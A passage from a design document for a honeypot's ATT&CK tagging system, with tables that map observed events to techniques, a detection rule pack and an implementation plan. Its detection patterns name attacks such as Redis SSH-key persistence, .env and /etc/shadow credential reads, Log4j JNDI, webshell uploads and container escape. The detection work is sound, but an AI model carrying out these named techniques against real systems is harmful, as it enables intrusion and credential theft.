Redis + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| `CONFIG SET dir` + `SET` SSH-key trick | TA0003 | T1098 | T1098.004 | H | +| `MODULE LOAD` | TA0002 | T1059 | (none) | H | +| `FLUSHALL` | TA0040 | T1485 | (none) | H | +| Unauth `INFO` from scanner | TA0043 | T1595 | T1595.002 | M | + +#### Elasticsearch + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| `_cluster/health` from scanner UA | TA0043 | T1595 | T1595.002 | M | +| `DELETE /_all` | TA0040 | T1485 | (none) | H | +| Mass `GET //_search` | TA0009 | T1213 | (none) | H | + +### A.3 Web & APIs + +#### HTTP (templated apps) + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| User-Agent matches sqlmap/nikto/etc | TA0043 | T1595 | T1595.002 | H | +| `/wp-login.php` brute | TA0006 | T1110 | (none) | H | +| `/.env` request | TA0007 | T1083 | (none) | H | +| `/.env` request | TA0006 | T1552 | T1552.001 | H | +| `/.git/config` request | TA0007 | T1083 | (none) | H | +| `/.git/config` request | TA0006 | T1552 | T1552.001 | H | +| Path traversal (`../`) | TA0001 | T1190 | (none) | H | +| `.php` POST (shell upload) | TA0001 | T1190 | (none) | H | +| `.php` POST (shell upload) | TA0003 | T1505 | T1505.003 | H | +| `.jsp` POST (shell upload) | TA0001 | T1190 | (none) | H | +| `.jsp` POST (shell upload) | TA0003 | T1505 | T1505.003 | H | +| Log4j JNDI in headers | TA0001 | T1190 | (none) | H | +| Webshell access pattern | TA0011 | T1059 | (none) | H | + +#### Docker API + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| `GET /version` from scanner | TA0043 | T1595 | T1595.002 | M | +| `POST /containers/create` w/ priv | TA0004 | T1611 | (none) | H | +| Bind mount of `/` | TA0004 | T1611 | (none) | H | + +#### Kubernetes + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| `/api/v1/namespaces/.../secrets` | TA0006 | T1552 | T1552.007 | H | +| `kubectl exec` mock | TA0002 | T1610 | (none) | H | +| `serviceaccount` token harvest | TA0006 | T1528 | (none) | H | + +#### LLMNR + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| Responder-style query/response | TA0009 | T1557 | T1557.001 | H | + +### A.4 File transfer & storage + +#### SMB + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| Null session enumeration | TA0007 | T1135 | (none) | H | +| Share listing | TA0007 | T1135 | (none) | H | +| File read | TA0009 | T1039 | (none) | H | +| File write (foothold) | TA0008 | T1021 | T1021.002 | H | +| Pass-the-hash signature | TA0006 | T1550 | T1550.002 | H | + +#### FTP + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| Anonymous login attempt | TA0006 | T1078 | T1078.001 | M | +| Brute attempt | TA0006 | T1110 | (none) | H | +| `STOR` of executable | TA0011 | T1105 | (none) | H | +| Mass `RETR` | TA0009 | T1039 | (none) | M | + +#### TFTP + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| `RRQ` of router config (`*-confg`) | TA0009 | T1602 | T1602.002 | H | +| `WRQ` upload | TA0011 | T1105 | (none) | H | + +### A.5 Directory & non-mail (LDAP) + +#### LDAP + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| Anonymous bind + search | TA0007 | T1087 | T1087.002 | H | +| BloodHound query signature | TA0007 | T1087 | T1087.002 | H | +| BloodHound query signature | TA0007 | T1482 | (none) | H | +| Bind brute | TA0006 | T1110 | (none) | H | + +### A.6 Mail (SMTP relay + non-relay, IMAP, POP3) + +The largest single section. Every SMTP message is captured in +full (headers + body + attachments) by both the relay and +non-relay services; the email lifter consumes them. IMAP/POP3 +provide additional auth-and-fetch patterns. + +#### SMTP — connection & command-level + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| Auth brute (`AUTH PLAIN/LOGIN`) | TA0006 | T1110 | (none) | H | +| `VRFY` enumeration | TA0007 | T1087 | (none) | H | +| `EXPN` enumeration | TA0007 | T1087 | (none) | H | +| Open relay test (foreign From + RCPT) | TA0043 | T1595 | (none) | H | +| `STARTTLS` downgrade attempt | TA0005 | T1562 | T1562.010 | M | +| `EHLO` hostname matches scanner | TA0043 | T1595 | T1595.002 | M | + +#### SMTP — message-level (whole message; `source_kind = "email"`) + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| RCPT count ≥ N (mass relay) | TA0040 | T1496 | (none) | H | +| RCPT count ≥ N + foreign From | TA0042 | T1586 | T1586.002 | H | +| RCPT count ≥ N + matching body across N | TA0001 | T1566 | (none) | H | +| Same body fingerprint, multiple Identities | TA0042 | T1583 | T1583.006 | H | +| Successful AUTH then large send burst | TA0042 | T1586 | T1586.002 | H | + +#### SMTP — header-level (`source_kind = "email_header"`) + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| `From:` ≠ `Return-Path:` domain | TA0005 | T1036 | (none) | H | +| `From:` ≠ `MAIL FROM:` domain | TA0005 | T1036 | (none) | H | +| Missing `DKIM-Signature:` | TA0005 | T1036 | (none) | M | +| `Authentication-Results:` SPF=fail | TA0005 | T1036 | (none) | M | +| Multiple `Received:` from scanner ASNs | TA0011 | T1090 | (none) | M | +| `X-Mailer:` matches phishing kit DB | TA0001 | T1566 | (none) | H | +| `X-Mailer:` matches phishing kit DB | TA0042 | T1588 | T1588.001 | H | +| Forged `Date:` header (skewed) | TA0005 | T1070 | T1070.006 | M | +| `Reply-To:` differs from `From:` domain| TA0005 | T1036 | (none) | M | +| Brand-impersonating display name | TA0005 | T1036 | T1036.005 | H | + +#### SMTP — body-level (`source_kind = "email_body"`) + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| Credential-harvest landing-page link | TA0001 | T1566 | T1566.002 | H | +| Credential-harvest landing-page link | TA0009 | T1056 | T1056.003 | H | +| IDN/punycode URL (`xn--…`) | TA0005 | T1036 | T1036.005 | H | +| IDN/punycode URL (`xn--…`) | TA0001 | T1566 | T1566.002 | H | +| Brand impersonation in subject + body | TA0001 | T1566 | T1566.002 | H | +| BEC pattern (urgent wire / CEO) | TA0001 | T1566 | T1566.003 | H | +| Sextortion template + BTC address | TA0001 | T1566 | (none) | H | +| Sextortion template + BTC address | TA0040 | T1657 | (none) | M | +| Encoded payload (base64 ≥ N bytes) | TA0011 | T1071 | T1071.003 | H | +| Encoded payload (base64 ≥ N bytes) | TA0005 | T1027 | (none) | H | +| Tracking-pixel beacon URL | TA0007 | T1592 | (none) | M | + +#### SMTP — attachment-level (`source_kind = "email_attachment"`) + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| Office macro (OLE / VBA detected) | TA0002 | T1204 | T1204.002 | H | +| Office macro (OLE / VBA detected) | TA0001 | T1566 | T1566.001 | H | +| Password-protected ZIP/RAR/7z | TA0005 | T1027 | (none) | H | +| Password-protected ZIP/RAR/7z | TA0001 | T1566 | T1566.001 | H | +| HTML smuggling pattern | TA0005 | T1027 | T1027.006 | H | +| `.lnk` / `.iso` / `.img` payload | TA0002 | T1204 | T1204.002 | H | +| Hash matches MalwareBazaar | TA0002 | T1204 | T1204.002 | H | +| Hash matches MalwareBazaar | TA0042 | T1588 | T1588.001 | H | +| Executable masqueraded by extension | TA0005 | T1036 | T1036.008 | H | + +#### IMAP / POP3 + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| Auth brute | TA0006 | T1110 | (none) | H | +| Successful auth + bulk `FETCH` | TA0009 | T1114 | T1114.002 | H | + +### A.7 ICS / IoT + +#### MQTT + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------------|------------|----------------|------| +| Wildcard SUBSCRIBE (`#`) | TA0100 (ICS) | T0801 | (none) | H | +| Auth brute | TA0006 | T1110 | (none) | H | + +#### SNMP + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| Default community string (`public`) | TA0007 | T1046 | (none) | H | +| Default community string (`public`) | TA0006 | T1078 | T1078.001 | H | +| `walk` of full MIB | TA0007 | T1046 | (none) | H | + +#### SIP + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| `OPTIONS` scan | TA0043 | T1595 | (none) | H | +| `REGISTER` brute | TA0006 | T1110 | (none) | H | + +#### Conpot (Modbus / S7 / etc) + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------------|------------|----------------|------| +| Modbus function-code scan | TA0102 (ICS) | T0846 | (none) | H | +| Coil/register write | TA0106 (ICS) | T0831 | (none) | H | + +### A.8 Cross-cutting + +#### Fingerprints (sniffer-side, network-level) + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| JARM matches known C2 framework | TA0011 | T1071 | T1071.001 | H | +| HASSH matches known offensive tooling | TA0002 | T1059 | (none) | H | +| JA3 matches known scanner | TA0043 | T1595 | T1595.002 | M | + +#### Canaries + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| AWS-key canary triggered | TA0006 | T1552 | T1552.001 | H | +| Honeydoc canary triggered | TA0009 | T1005 | (none) | H | + +#### Payloads + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| ELF/PE upload | TA0011 | T1105 | (none) | H | +| Hash matches MalwareBazaar | TA0002 | T1059 | (none) | H | +| Shellcode signature | TA0002 | T1055 | (none) | H | + +#### Identity-rollup-only (cross-Attacker; no single source row) + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| Same creds, ≥3 IPs same Identity | TA0006 | T1110 | T1110.003 | H | +| Same creds, ≥3 services same Identity | TA0006 | T1110 | T1110.004 | H | +| ≥3 ASNs in <24h, same Identity | TA0042 | T1583 | T1583.003 | M | +| Same body fingerprint, ≥2 Identities | TA0042 | T1583 | T1583.006 | H | + +### A.9 Canary fingerprint (browser payload derivations) + +The canary fingerprint payload (`decnet/canary/fingerprint_payload.js`) +runs inside an opened HTML/SVG canary and harvests browser +primitives — navigator/screen/timezone/connection, canvas + WebGL + +audio + font fingerprints, WebRTC IP leak, perf timing jitter, +permissions, plus a composite identity hash. + +**Boundary discipline (see also "Enrichment vs tag boundary" in +Hard parts §7):** the bulk fingerprint blob enriches +`Attacker.fingerprints` and feeds the clusterer; **only specific +behavioral derivations** below produce `ttp_tag` rows. + +Two source kinds: + +- `canary` — the trigger event itself (the `/c/` fetch). Same + rows as before. +- `canary_fingerprint` — derivations from the fingerprint payload. + +#### canary trigger (`source_kind = "canary"`) + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------|---------|------------|----------------|------| +| AWS-key canary triggered | TA0006 | T1552 | T1552.001 | H | +| Honeydoc canary triggered | TA0009 | T1005 | (none) | H | +| Any canary triggered (generic) | TA0009 | T1005 | (none) | M | + +#### Browser automation signals (`source_kind = "canary_fingerprint"`) + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------------------|---------|-----------|----------------|------| +| `navigator.webdriver === true` | TA0002 | T1059 | (none) | H | +| Canvas/audio hash matches Puppeteer signature | TA0002 | T1059 | (none) | H | +| Canvas/audio hash matches Puppeteer signature | TA0042 | T1588 | T1588.002 | H | +| Canvas/audio hash matches Playwright signature | TA0002 | T1059 | (none) | H | +| Canvas/audio hash matches Playwright signature | TA0042 | T1588 | T1588.002 | H | +| Canvas/audio hash matches Selenium signature | TA0002 | T1059 | (none) | H | +| WebGL unmasked renderer = SwiftShader (headless) | TA0002 | T1059 | (none) | H | +| WebGL unmasked renderer = llvmpipe (headless) | TA0002 | T1059 | (none) | H | +| Perf timing jitter signature consistent with VM | TA0042 | T1583 | T1583.001 | M | + +#### Proxy / VPN / opsec leakage (`source_kind = "canary_fingerprint"`) + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------------------|---------|-----------|----------------|------| +| WebRTC private IP doesn't match source-IP geo | TA0011 | T1090 | (none) | H | +| WebRTC reveals known Tor exit / VPN endpoint | TA0011 | T1090 | T1090.003 | H | +| `Intl` timezone vs source-IP geo mismatch (>3 zones) | TA0011 | T1090 | (none) | M | +| `navigator.language(s)` vs source-IP country mismatch | TA0011 | T1090 | (none) | M | +| Tor Browser canvas/font signature | TA0011 | T1090 | T1090.003 | M | +| Brave-shields / anti-fingerprint browser pattern | TA0005 | T1027 | (none) | M | + +#### Masquerading / inconsistency (`source_kind = "canary_fingerprint"`) + +| Event | Tactic | Technique | Sub-technique | Conf | +|----------------------------------------------------|---------|-----------|----------------|------| +| `navigator.platform` inconsistent with `userAgent` | TA0005 | T1036 | (none) | H | +| `userAgent` claims mobile, screen says desktop | TA0005 | T1036 | (none) | M | +| `userAgent` family vs WebGL renderer mismatch | TA0005 | T1036 | (none) | M | + +**Identity-merge guard rail.** The composite `fp.id` hash matching +across IPs/Identities is an **identity-merge signal, NOT a TTP** — +same argument as keystroke `kd_digraph_simhash` (Appendix D §D.3). +The lifter does not emit a TTP from a bare composite-hash match. +That signal goes upstream into the clusterer. + +### A.10 Intel verdicts (third-party providers) + +`source_kind = "intel_verdict"` for everything in this section. +Source row is the `AttackerIntel` row matched by `attacker_uuid`. +All tags here are **opportunistic** — they only fire when the +enrich worker has populated the relevant per-provider column. A +fresh attacker with no intel row yet produces zero tags from this +engine, and the dashboard renders normally with whatever the other +engines produced. + +#### AbuseIPDB categories + +AbuseIPDB returns up to two categories per report plus an aggregate +abuse-confidence score (0–100). Per-category mapping: + +| AbuseIPDB category | Tactic | Technique | Sub-tech | Conf | +|----------------------------------------------|--------|-----------|----------|-------| +| 14 — Port Scan | TA0007 | T1046 | (none) | H | +| 14 — Port Scan | TA0043 | T1595 | T1595.001| H | +| 15 — Hacking | TA0001 | T1190 | (none) | M | +| 18 — Brute-Force | TA0006 | T1110 | (none) | H | +| 18 + service=SSH | TA0006 | T1110 | T1110.001| H | +| 19 — Bad Web Bot | TA0043 | T1595 | T1595.002| M | +| 20 — Exploited Host | TA0001 | T1078 | (none) | M | +| 21 — Web App Attack | TA0001 | T1190 | (none) | H | +| 22 — SSH | TA0006 | T1110 | (none) | M | +| 23 — IoT Targeted | TA0001 | T1190 | (none) | M | +| 11 — Email Spam | TA0040 | T1496 | (none) | M | +| 11 — Email Spam (high score, ≥80) | TA0001 | T1566 | (none) | M | +| 10 — DDoS | TA0040 | T1498 | (none) | L | +| 5 — FTP Brute-Force | TA0006 | T1110 | (none) | H | +| 17 — VPN IP | TA0011 | T1090 | (none) | M | +| 9 — Open Proxy | TA0011 | T1090 | (none) | M | +| 4 — DDoS (untyped) | (drop — too muddy for v0) | | + +Final tag confidence = listed band × `abuseipdb_score / 100`. + +#### GreyNoise classification + tags + +| GreyNoise signal | Tactic | Technique | Sub-tech | Conf | +|----------------------------------------------|--------|-----------|-----------|-------| +| classification = "malicious" | (no tag alone — needs tag) | | +| classification = "benign" | (no tag — confidence-decrement existing tags) | +| classification = "scanner" | TA0043 | T1595 | T1595.002 | H | +| tag matches "tor_exit_node" | TA0011 | T1090 | T1090.003 | H | +| tag matches known C2 family (e.g. "cobalt_strike", "metasploit") | TA0011 | T1071 | T1071.001 | H | +| tag matches known C2 family | TA0042 | T1588 | T1588.001 | H | +| tag matches "ssh_bruteforcer" | TA0006 | T1110 | T1110.001 | H | +| tag matches "web_crawler" (non-Google) | TA0043 | T1595 | T1595.002 | M | + +Final confidence = listed band × 1.0 (GreyNoise has no per-verdict +score; classification is binary). Apply the "benign" decrement +*only* to confidence-bumpable existing tags, never to identity- +rollup or behavioral-lifter tags (those have independent +substantiation). + +#### abuse.ch Feodo Tracker + +| Feodo signal | Tactic | Technique | Sub-tech | Conf | +|----------------------------------------------|--------|-----------|-----------|-------| +| `feodo_listed = True` | TA0011 | T1071 | T1071.001 | H | +| `feodo_listed = True` | TA0042 | T1588 | T1588.001 | H | +| `feodo_raw.malware` ∈ {Emotet, Dridex, QakBot, TrickBot, Heodo, …} → family attribution carried in `evidence.malware_family` | (above tags) | (above) | (above) | H | + +Family attribution lands in the tag `evidence` JSON. It does not +spawn additional technique tags by itself — that path is reserved +for ThreatFox where the IOC type genuinely varies. + +#### abuse.ch ThreatFox + +ThreatFox returns IOC type + malware family. Per-IOC-type mapping: + +| ThreatFox IOC type | Tactic | Technique | Sub-tech | Conf | +|----------------------------------------------|--------|-----------|-----------|-------| +| `botnet_cc` | TA0011 | T1071 | T1071.001 | H | +| `botnet_cc` | TA0042 | T1588 | T1588.001 | H | +| `payload_delivery` | TA0011 | T1105 | (none) | H | +| `payload_delivery` | TA0042 | T1588 | T1588.001 | H | +| `c2_server` | TA0011 | T1071 | T1071.001 | H | +| `download_url` | TA0011 | T1105 | (none) | H | + +Family name (e.g. "cobalt_strike", "sliver", "havoc", +"asyncrat") is carried in `evidence.malware_family` for downstream +attribution. ThreatFox-derived tags carry the highest base +confidence in v0 (0.95) — the IOC database is curated. + +--- + +## Appendix B — Initial rule pack (v0) + +Target: 40–55 rule files. A single rule may emit multiple +techniques (see worked example). Picked by "what does our existing +dataset already see most often, and what would an analyst most +want to filter on?": + +### Shell / command (R0001–R0030) + +1. `R0001` — generic auth brute (any service) → T1110 +2. `R0002` — password guessing per-account → T1110.001 +3. `R0003` — password spraying cross-account (identity-rollup) → T1110.003 +4. `R0004` — credential stuffing (CredentialReuse-driven) → T1110.004 +5. `R0005` — valid account use post-success → T1078 +6. `R0006` — default credentials → T1078.001 +7. `R0007` — sqlmap UA → T1190 + T1595.002 +8. `R0008` — Log4j JNDI → T1190 +9. `R0009` — path traversal → T1190 +10. `R0010` — Unix shell exec → T1059.004 +11. `R0011` — generic command/scripting → T1059 +12. `R0012` — ingress tool transfer → T1105 +13. `R0013` — `/etc/passwd` read → T1083 +14. `R0014` — `/etc/shadow` read → T1003.008 +15. `R0015` — SUID search → T1083 + T1548.001 +16. `R0016` — recursive find → T1083 +17. `R0017` — network service scan → T1046 + T1595 +18. `R0018` — system info discovery → T1082 +19. `R0019` — user discovery → T1033 +20. `R0020` — network config discovery → T1016 +21. `R0021` — network connections discovery → T1049 +22. `R0022` — LDAP account discovery → T1087.002 + T1482 +23. `R0023` — SMB share discovery → T1135 +24. `R0024` — local account creation → T1136.001 +25. `R0025` — cron persistence → T1053.003 +26. `R0026` — Redis SSH-key persistence → T1098.004 +27. `R0027` — webshell installation → T1505.003 +28. `R0028` — clear command history → T1070.003 +29. `R0029` — sudo abuse → T1548.003 +30. `R0030` — JARM/HASSH C2 fingerprint → T1071 + T1071.001 + +### Behavioral / cross-event (R0031–R0040) + +31. `R0031` — beaconing behavioral → T1071 + T1029 +32. `R0032` — data destruction (FLUSHALL/DROP/DELETE _all) → T1485 +33. `R0033` — ransom note pattern → T1486 +34. `R0034` — exfil over web → T1567 +35. `R0035` — DB mass-read → T1213 +36. `R0036` — credentials in files (env/git/canary) → T1552.001 +37. `R0037` — k8s service account tokens → T1552.007 +38. `R0038` — Docker host escape → T1611 +39. `R0039` — LLMNR poisoning → T1557.001 +40. `R0040` — TFTP router config retrieval → T1602.002 + +### Email / SMTP (R0041–R0048) + +41. `R0041` — open-relay abuse (high-RCPT, foreign From) → T1496 + T1586.002 +42. `R0042` — mass phishing campaign (RCPT count + body match) → T1566 +43. `R0043` — phishing kit X-Mailer signature → T1566 + T1588.001 +44. `R0044` — IDN/homoglyph URL in body → T1036.005 + T1566.002 +45. `R0045` — sender masquerade (From/Return-Path mismatch, DKIM) → T1036 +46. `R0046` — malicious attachment (macro/LNK/ISO/maldoc) → T1204.002 + T1566.001 +47. `R0047` — BEC pattern (urgent wire / CEO impersonation) → T1566.003 +48. `R0048` — encoded payload in body (base64 over threshold) → T1071.003 + T1027 + +### Canary fingerprint (R0049–R0053) + +49. `R0049` — `navigator.webdriver` automation flag → T1059 +50. `R0050` — canvas/audio hash matches known automation tool (Puppeteer/Playwright/Selenium) → T1059 + T1588.002 +51. `R0051` — WebRTC IP leak: private IP doesn't match source-IP geo → T1090 +52. `R0052` — TZ / language vs source-IP geo mismatch → T1090 +53. `R0053` — `navigator.platform` / userAgent / WebGL renderer inconsistency → T1036 + +### Intel verdicts (R0054–R0058) + +Each rule reads a specific provider column and emits per the +mapping tables in Appendix A.10. **All five tolerate absence +silently** — a null column is "no tag from this rule", never an +error. + +54. `R0054` — AbuseIPDB category → ATT&CK technique (per A.10 table) +55. `R0055` — GreyNoise classification + tag → ATT&CK technique (per A.10 table) +56. `R0056` — Feodo Tracker hit → T1071.001 + T1588.001 with family attribution +57. `R0057` — ThreatFox IOC type → ATT&CK technique with family attribution +58. `R0058` — Aggregate verdict = "malicious" with no specific provider mapping → confidence-bump existing tags only (no new tag emission) + +### Reserved (R0059–R0065) + +ICS-specific (Modbus/S7), additional aggregate / session-end rules, +plus any precision-target failures from the v0 cohort that need +splitting. Rule slots reserved so IDs stay stable. + +## Appendix C — Rule precision targets + +Per rule, before merge: + +- **High-confidence rules (≥0.85):** must achieve ≥95% precision + on a manually-labelled holdout of 100 random matches from the + existing attacker corpus. Tests live in + `tests/ttp/rule_precision/`. +- **Medium-confidence rules (0.6–0.85):** ≥80% precision on 100 + matches. +- **Low-confidence rules (<0.6):** not shipped in v0. Hidden by + default if added later. + +Recall is intentionally not a v1 target. We would rather miss a +technique than mislabel one — false positives flow to the SIEM and +poison downstream automation. + +--- + +## Appendix D — Anticipated biometric lifters (deferred) + +This appendix exists so that when keystroke biometrics ingestion +ships (`SessionProfile` columns become populated) and any further +biometric FK lands on `AttackerIdentity`, the integration point +into the TTP layer is already specified. Nothing in this appendix +ships in the v0 worker. + +**Architectural commitment:** biometric features live on +`SessionProfile` and on `AttackerIdentity` (FK from there to +whatever biometric profile table emerges). The TTP worker reads +them via the existing `session_id` / `identity_uuid` joins on +`ttp_tag`. **No biometric-specific columns are added to `ttp_tag`.** + +### D.1 Source kinds (reserved) + +- `keystroke_session` — per-session keystroke-derived signal, + `source_id` = `SessionProfile.sid`. +- `biometric_match` — cross-session keystroke similarity signal, + `source_id` = synthetic match-event UUID assembled by the lifter. + +### D.2 Anticipated rules (illustrative, not pre-shipped) + +| Source signal | Tactic | Technique | Sub-technique | Confidence | +|--------------------------------------------------------------|---------|-----------|---------------|------------| +| `kd_iki_mean` < threshold AND `kd_burst_ratio` > threshold | TA0002 | T1059 | (none) | 0.85 | +| `kd_start_of_action_latency` ≈ 0 | TA0002 | T1059 | (none) | 0.80 | +| `kd_pause_hist_distracted` heavy (human signal) | (adjustment) — confidence-decrement on automation tags | +| HASSH match + matching cross-session simhash cohort | TA0011 | T1071 | T1071.001 | 0.95 (bumped) | +| Bot-signal cluster + successful auth | TA0006 | T1110 | (none) | 0.95 (bumped) | + +### D.3 Explicit non-rule: identity merging is NOT a TTP + +Cross-session `kd_digraph_simhash` matches are **identity-merge +signals**, not TTP signals. They belong upstream in the clusterer +(same typist across IPs → merge identities). Tagging them as TTPs +would be a category error and would pollute the technique +heatmap with non-behavioral inferences. + +The lifter will deliberately NOT emit a TTP from the bare simhash +match. It only emits TTPs when the cohort match is composed with a +behavioral primitive (e.g., "matching simhash cohort + tooling +fingerprint match → tooling-attribution-grade T1071.001 with +elevated confidence"). + +### D.4 Migration footprint when biometrics ships + +- `ttp_tag`: zero changes. New `source_kind` values appear in + production data; existing rows are unaffected. +- `decnet/ttp/impl/biometric_lifter.py`: new file, new lifter + registered with the worker. +- New rule pack entries in `rules/biometric_*.yaml`. +- API: no new endpoints; existing `/by-identity` / `/by-session` + surfaces serve the new tags transparently. +- UI: no schema-driven changes; existing TTP heatmap renders the + new techniques like any other. + +This is the forward-compat win: the *infrastructure* absorbs the +new feature; only the *content* changes. + +--- + +## Appendix E — CDD plan (Contract-Driven Development) + +This appendix lays out the order of work in CDD discipline: +**contracts first, tests second, implementation last.** Nothing +in this section is implementation; it specifies what to create +and in what order. + +The project's "commit per task with tests in the same commit" +convention applies to the implementation phase. The contracts and +test phases are themselves split into commit-sized steps. + +### E.1 Contracts + +The contracts define *shapes* and *signatures* with no behavior. +Empty function bodies (`raise NotImplementedError`), empty API +endpoint handlers (returning `[]` typed correctly), empty Tagger +subclasses. The codebase compiles, mypy passes, the worker +registers, the API routes resolve — but nothing produces tags yet. + +Contracts ship in this order, one commit per step: + +**E.1.1 — Schema contract** (`decnet/web/db/models/ttp.py`) + +- `TTPTag` SQLModel with the schema from "Schema" section above, + including: `evidence` as `dict[str, Any]` over a SQLAlchemy JSON + column (`Column(JSON, nullable=False)`); `attack_release` as + an indexed `str` column; `__table_args__` carrying the + `CheckConstraint("attacker_uuid IS NOT NULL OR identity_uuid IS + NOT NULL", name="ttp_tag_has_anchor")`; and an `__init__` guard + that raises `ValueError` when both anchors are NULL (belt-and- + braces for MySQL <8.0.16 where CHECK is silently ignored). +- Per-`source_kind` `TypedDict` definitions (`CommandEvidence`, + `IntelEvidence`, `EmailEvidence`, `CanaryFingerprintEvidence`, + …) declared in the same file alongside `TTPTag` per the "all + models in one place" project rule. Adding a new `source_kind` + requires adding a `TypedDict` here AND a shape entry in + `tests/ttp/test_evidence_shape.py`. +- `compute_tag_uuid(source_kind, source_id, rule_id, rule_version, + technique_id, sub_technique_id) -> str` — deterministic + **UUIDv5** under the fixed namespace + `uuid.UUID("decnet:ttp_tag:v1")` (concretely: + `uuid.uuid5(_TTP_TAG_NS, "|".join(...))`). Stable across + processes and Python versions; produces a real RFC-4122 UUID + string, not a truncated SHA-256. Empty function body permitted; + the test phase pins the algorithm and the namespace constant. +- Re-export from `decnet/web/db/models/__init__.py`. + +**E.1.2 — Bus topic contract** (`decnet/bus/topics.py`) + +- New constants: `TTP_TAGGED`, `TTP_RULE_FIRED`, + `TTP_RULE_SUPPRESSED`. +- Confirm `ATTACKER_ENRICHED` exists (it does — verify), confirm + `IDENTITY_FORMED` / `IDENTITY_MERGED` exist (they do). +- New `EMAIL_RECEIVED` topic constant. +- Wiki update (`wiki-checkout/Service-Bus.md`) lands in the same + commit per project convention. + +**E.1.3 — Tagger ABC** (`decnet/ttp/base.py`) + +- `class TaggerEvent(NamedTuple)` — the input shape: source_kind, + source_id, attacker_uuid, identity_uuid, session_id, decky_id, + payload (opaque dict). +- `class Tagger(ABC)` with `async def tag(self, event: + TaggerEvent) -> list[TTPTag]` and `def name(self) -> str`. +- `class TolerantTagger(Tagger)` mixin — wraps `tag()` so any + uncaught exception is logged and `[]` returned, never propagated. + Every lifter that consumes sibling-worker output inherits from + this. The "tolerates absence" property is enforced *in the + base class*, not on trust. + +**E.1.4 — Tagger factory** (`decnet/ttp/factory.py`) + +- `get_tagger() -> Tagger` reading `DECNET_TTP_TAGGER_TYPE` env + var. Mirrors `decnet.intel.factory` and `decnet.clustering.factory`. +- Default `composite` returns a `CompositeTagger` that fans the + event out to all registered lifters and concatenates results. +- `_KNOWN: tuple[str, ...]` enumerates the valid tagger names. + +**E.1.5 — RuleEngine contract** (`decnet/ttp/impl/rule_engine.py`) + +- `class CompiledRule(NamedTuple)`: rule_id, rule_version, name, + applies_to, match_spec, emits, evidence_fields, **state** + (`RuleState`). +- `class RuleEngine`: + - `def __init__(self, store: RuleStore)` — engine consumes from + a store, never reads YAML directly. + - `async def evaluate(self, event: TaggerEvent) -> list[TTPTag]`. + - `async def watch_store(self) -> None` — subscribes to + `store.subscribe_changes()` and atomically swaps individual + compiled rules into the dispatch index. +- `class RuleSchema` (Pydantic) for YAML rule validation. Owned + by the store, not the engine — the engine receives already- + validated `CompiledRule` objects. + +**E.1.6 — Per-lifter contracts** (one file each, all empty bodies) + +- `decnet/ttp/impl/behavioral_lifter.py` — `BehavioralLifter(TolerantTagger)`. +- `decnet/ttp/impl/intel_lifter.py` — `IntelLifter(TolerantTagger)`. +- `decnet/ttp/impl/email_lifter.py` — `EmailLifter(TolerantTagger)`. +- `decnet/ttp/impl/canary_fingerprint_lifter.py` — + `CanaryFingerprintLifter(TolerantTagger)`. +- `decnet/ttp/impl/identity_lifter.py` — `IdentityLifter(TolerantTagger)`. +- `decnet/ttp/impl/credential_lifter.py` — `CredentialLifter(TolerantTagger)`. + +Each declares the event source_kinds it handles via a class-level +`HANDLES: frozenset[str]`. The composite tagger uses this to skip +unrelated events. + +**E.1.7 — Worker contract** (`decnet/ttp/worker.py`) + +- `async def run_ttp_worker_loop(...)` signature matching + `decnet/clustering/worker.py` and `decnet/intel/worker.py` (the + parameter shape is already standardised across workers — copy it). +- Bus subscriptions enumerated as a module-level constant + `_TOPICS: tuple[str, ...]` so the test phase can assert + subscription wiring without invoking the loop. +- Worker registered in `decnet/web/worker_registry.py` as `"ttp"`. + +**E.1.8 — UKC bridge contract** (`decnet/clustering/ukc.py`) + +- `ATTACK_TACTIC_TO_UKC: dict[str, UKCPhase]` — the static map + from the body of this doc. +- `def tactic_to_ukc_phase(tactic: str) -> UKCPhase | None`. +- Inverse: `def ukc_phase_to_tactic(phase: UKCPhase) -> str | None` + for places where the campaign clusterer projects back. + +**E.1.9 — API contract** (`decnet/web/router/ttp/`) + +- Six FastAPI router files matching the API surface above: + `api_get_techniques.py`, `api_get_by_identity.py`, + `api_get_by_attacker.py`, `api_get_by_campaign.py`, + `api_get_by_session.py`, `api_get_rules.py`, + `api_export_navigator.py`. +- Each handler returns the typed empty value (`[]` for 